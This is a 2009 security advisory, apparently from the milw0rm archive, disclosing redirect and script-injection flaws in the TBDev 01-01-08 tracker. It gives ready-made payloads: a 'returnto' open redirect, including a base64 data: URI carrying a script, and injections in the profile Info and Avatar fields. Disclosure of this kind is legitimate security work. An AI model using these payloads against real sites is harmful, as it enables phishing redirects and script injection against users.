Professional Documents
Culture Documents
8942
8942
Credits: InterN0T
External Links:
http://www.tbdev.net
Cross Site Script Redirection: (Anyone, the enduser will need to log in
though)
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=http://[HOST]
http://[HOST]/tbdev/tbdev-01-01-08/login.php?
returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
HTML Injection:
1) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Info field: </textarea><script>alert(0)</script> << is reflected
locally only!
2) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Avatar field: javascript:alert(0)
Conclusion:
This system was fun to find bad code in, it sure had a nice diversity of
vulnerabilities.
Reference:
http://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-
multiple-vulnerabilities.html
Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.
# milw0rm.com [2009-06-12]